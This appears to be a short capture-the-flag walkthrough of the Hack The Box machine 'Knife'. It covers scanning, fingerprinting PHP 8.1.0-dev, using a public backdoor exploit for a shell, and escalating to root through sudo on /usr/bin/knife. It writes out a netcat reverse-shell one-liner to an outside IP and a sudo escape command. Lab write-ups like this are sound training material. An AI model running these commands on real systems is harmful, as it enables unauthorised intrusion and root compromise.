KNIFE

Scanning

NMAP

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 be:54:9c:a3:67:c3:15:c3:64:71:7f:6a:53:4a:4c:21 (RSA)
|   256 bf:8a:3f:d4:06:e9:2e:87:4e:c9:7e:ab:22:0e:c0:ee (ECDSA)
|_  256 1a:de:a1:cc:37:ce:53:bb:1b:fb:2b:0b:ad:b3:f6:84 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title:  Emergent Medical Idea
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Enumeration

Whatweb

➜  knife.htb sudo whatweb knife.htb      
http://knife.htb [200 OK] Apache[2.4.41], Country[RESERVED][ZZ], HTML5, HTTPServer[Ubuntu Linux][Apache/2.4.41 (Ubuntu)], IP[10.10.10.242], PHP[8.1.0-dev], Script, Title[Emergent Medical Idea], X-Powered-By[PHP/8.1.0-dev]

Exploit

google search for PHP/8.1.0-dev exploit

find this https://www.exploit-db.com/exploits/49933

just run it ...

➜  knife.htb python3 exploit.py 
Enter the full host url:
http://knife.htb

Interactive shell is opened on http://knife.htb 
Can't acces tty; job crontol turned off.
$ whoami
james

Privilege Escalation

first set reverse shell because above shell have some problems

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.16.93 4242 >/tmp/f

lets take a look on sudo rights

sudo -l

It can run with /usr/bin/knife as a root. We would execute the following command.

sudo /usr/bin/knife exec --exec "exec '/bin/sh -i'"

We executed the above command and got the root shell.

PreviousCAPNextBOUNTYHUNTER

Last updated